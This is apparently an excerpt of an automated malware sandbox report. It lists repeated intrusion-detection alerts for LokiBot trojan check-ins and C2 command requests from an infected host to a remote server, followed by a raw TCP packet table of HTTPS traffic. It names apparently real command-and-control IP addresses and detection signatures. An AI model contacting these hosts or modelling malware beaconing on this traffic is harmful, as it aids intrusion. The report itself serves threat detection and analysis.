11/25/21-10:55:10.499801	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50683	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.026773	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50684	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.026773	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50684	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.026773	TCP	2025381	ET TROJAN LokiBot Checkin	50684	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.026773	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50684	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.540230	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50685	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.540230	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50685	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.540230	TCP	2025381	ET TROJAN LokiBot Checkin	50685	80	192.168.11.20	176.223.209.128
11/25/21-10:55:11.540230	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50685	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.060170	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50686	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.060170	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50686	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.060170	TCP	2025381	ET TROJAN LokiBot Checkin	50686	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.060170	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50686	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.564542	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50687	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.564542	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50687	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.564542	TCP	2025381	ET TROJAN LokiBot Checkin	50687	80	192.168.11.20	176.223.209.128
11/25/21-10:55:12.564542	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50687	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.073926	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50688	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.073926	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50688	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.073926	TCP	2025381	ET TROJAN LokiBot Checkin	50688	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.073926	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50688	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.588604	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50689	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.588604	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50689	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.588604	TCP	2025381	ET TROJAN LokiBot Checkin	50689	80	192.168.11.20	176.223.209.128
11/25/21-10:55:13.588604	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50689	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.101732	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50690	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.101732	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50690	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.101732	TCP	2025381	ET TROJAN LokiBot Checkin	50690	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.101732	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50690	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.619405	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50691	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.619405	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50691	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.619405	TCP	2025381	ET TROJAN LokiBot Checkin	50691	80	192.168.11.20	176.223.209.128
11/25/21-10:55:14.619405	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50691	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.119361	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50692	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.119361	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50692	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.119361	TCP	2025381	ET TROJAN LokiBot Checkin	50692	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.119361	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50692	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.607178	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50693	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.607178	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50693	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.607178	TCP	2025381	ET TROJAN LokiBot Checkin	50693	80	192.168.11.20	176.223.209.128
11/25/21-10:55:15.607178	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50693	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.105694	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50694	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.105694	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50694	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.105694	TCP	2025381	ET TROJAN LokiBot Checkin	50694	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.105694	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50694	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.623551	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50695	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.623551	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50695	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.623551	TCP	2025381	ET TROJAN LokiBot Checkin	50695	80	192.168.11.20	176.223.209.128
11/25/21-10:55:16.623551	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50695	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.136322	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50696	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.136322	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50696	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.136322	TCP	2025381	ET TROJAN LokiBot Checkin	50696	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.136322	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50696	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.661094	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50697	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.661094	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50697	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.661094	TCP	2025381	ET TROJAN LokiBot Checkin	50697	80	192.168.11.20	176.223.209.128
11/25/21-10:55:17.661094	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50697	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.167114	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50698	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.167114	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50698	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.167114	TCP	2025381	ET TROJAN LokiBot Checkin	50698	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.167114	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50698	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.649872	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50699	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.649872	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50699	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.649872	TCP	2025381	ET TROJAN LokiBot Checkin	50699	80	192.168.11.20	176.223.209.128
11/25/21-10:55:18.649872	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50699	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.101720	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50700	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.101720	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50700	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.101720	TCP	2025381	ET TROJAN LokiBot Checkin	50700	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.101720	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50700	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.627458	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50701	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.627458	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50701	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.627458	TCP	2025381	ET TROJAN LokiBot Checkin	50701	80	192.168.11.20	176.223.209.128
11/25/21-10:55:19.627458	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50701	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.138106	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50702	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.138106	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50702	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.138106	TCP	2025381	ET TROJAN LokiBot Checkin	50702	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.138106	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50702	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.632791	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50703	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.632791	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50703	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.632791	TCP	2025381	ET TROJAN LokiBot Checkin	50703	80	192.168.11.20	176.223.209.128
11/25/21-10:55:20.632791	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50703	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.146267	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50704	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.146267	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50704	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.146267	TCP	2025381	ET TROJAN LokiBot Checkin	50704	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.146267	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50704	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.663106	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50705	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.663106	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50705	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.663106	TCP	2025381	ET TROJAN LokiBot Checkin	50705	80	192.168.11.20	176.223.209.128
11/25/21-10:55:21.663106	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50705	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.180632	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50706	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.180632	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50706	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.180632	TCP	2025381	ET TROJAN LokiBot Checkin	50706	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.180632	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50706	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.690105	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50707	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.690105	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50707	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.690105	TCP	2025381	ET TROJAN LokiBot Checkin	50707	80	192.168.11.20	176.223.209.128
11/25/21-10:55:22.690105	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50707	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.208795	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50708	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.208795	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50708	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.208795	TCP	2025381	ET TROJAN LokiBot Checkin	50708	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.208795	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50708	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.713368	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50709	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.713368	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50709	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.713368	TCP	2025381	ET TROJAN LokiBot Checkin	50709	80	192.168.11.20	176.223.209.128
11/25/21-10:55:23.713368	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50709	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.216252	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50710	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.216252	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50710	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.216252	TCP	2025381	ET TROJAN LokiBot Checkin	50710	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.216252	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50710	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.719606	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50711	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.719606	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50711	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.719606	TCP	2025381	ET TROJAN LokiBot Checkin	50711	80	192.168.11.20	176.223.209.128
11/25/21-10:55:24.719606	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50711	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.235141	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50712	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.235141	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50712	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.235141	TCP	2025381	ET TROJAN LokiBot Checkin	50712	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.235141	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50712	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.759054	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50713	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.759054	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50713	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.759054	TCP	2025381	ET TROJAN LokiBot Checkin	50713	80	192.168.11.20	176.223.209.128
11/25/21-10:55:25.759054	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50713	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.277776	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50714	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.277776	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50714	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.277776	TCP	2025381	ET TROJAN LokiBot Checkin	50714	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.277776	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50714	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.773687	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50715	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.773687	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50715	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.773687	TCP	2025381	ET TROJAN LokiBot Checkin	50715	80	192.168.11.20	176.223.209.128
11/25/21-10:55:26.773687	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50715	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.262392	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50716	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.262392	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50716	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.262392	TCP	2025381	ET TROJAN LokiBot Checkin	50716	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.262392	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50716	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.777041	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50717	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.777041	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50717	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.777041	TCP	2025381	ET TROJAN LokiBot Checkin	50717	80	192.168.11.20	176.223.209.128
11/25/21-10:55:27.777041	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50717	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.274622	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50718	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.274622	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50718	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.274622	TCP	2025381	ET TROJAN LokiBot Checkin	50718	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.274622	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50718	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.757055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50719	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.757055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50719	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.757055	TCP	2025381	ET TROJAN LokiBot Checkin	50719	80	192.168.11.20	176.223.209.128
11/25/21-10:55:28.757055	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50719	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.273209	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50720	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.273209	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50720	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.273209	TCP	2025381	ET TROJAN LokiBot Checkin	50720	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.273209	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50720	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.703563	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50721	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.703563	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50721	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.703563	TCP	2025381	ET TROJAN LokiBot Checkin	50721	80	192.168.11.20	176.223.209.128
11/25/21-10:55:29.703563	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50721	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.142951	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50722	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.142951	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50722	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.142951	TCP	2025381	ET TROJAN LokiBot Checkin	50722	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.142951	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50722	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.577953	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50723	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.577953	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50723	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.577953	TCP	2025381	ET TROJAN LokiBot Checkin	50723	80	192.168.11.20	176.223.209.128
11/25/21-10:55:30.577953	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50723	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.094477	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50724	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.094477	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50724	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.094477	TCP	2025381	ET TROJAN LokiBot Checkin	50724	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.094477	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50724	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.594377	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50725	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.594377	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50725	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.594377	TCP	2025381	ET TROJAN LokiBot Checkin	50725	80	192.168.11.20	176.223.209.128
11/25/21-10:55:31.594377	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50725	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.108072	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50726	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.108072	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50726	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.108072	TCP	2025381	ET TROJAN LokiBot Checkin	50726	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.108072	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50726	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.638413	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50727	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.638413	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50727	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.638413	TCP	2025381	ET TROJAN LokiBot Checkin	50727	80	192.168.11.20	176.223.209.128
11/25/21-10:55:32.638413	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50727	80	192.168.11.20	176.223.209.128

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 10:47:51.315337896 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.315355062 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:51.315623045 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.327244043 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.327254057 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:51.757873058 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:51.758124113 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.904304028 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.904364109 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:51.905023098 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:51.905283928 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.908416033 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:51.951900959 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.230103970 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.230159998 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.230254889 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.230294943 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.230305910 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.230458021 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.230494976 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.438500881 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.438532114 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.438781977 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.439002991 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.439160109 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.439258099 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.439333916 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.439368010 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.439486027 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.439529896 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.439558983 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.645909071 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.645930052 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.646119118 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.646176100 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.647803068 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.648298025 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.648332119 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.648364067 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.648547888 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.648597956 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.648950100 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.688452005 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.688659906 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.688813925 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.854479074 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.854779005 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.857505083 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.857702971 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.857880116 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.858072042 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.858251095 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.858294964 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.858325005 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.858409882 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.858500004 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.858530998 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.858720064 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.858789921 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.858895063 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.859002113 CET	49816	443	192.168.11.20	197.242.150.64
Nov 25, 2021 10:47:52.859046936 CET	443	49816	197.242.150.64	192.168.11.20
Nov 25, 2021 10:47:52.859054089 CET	49816	443	192.168.11.20	197.242.150.64
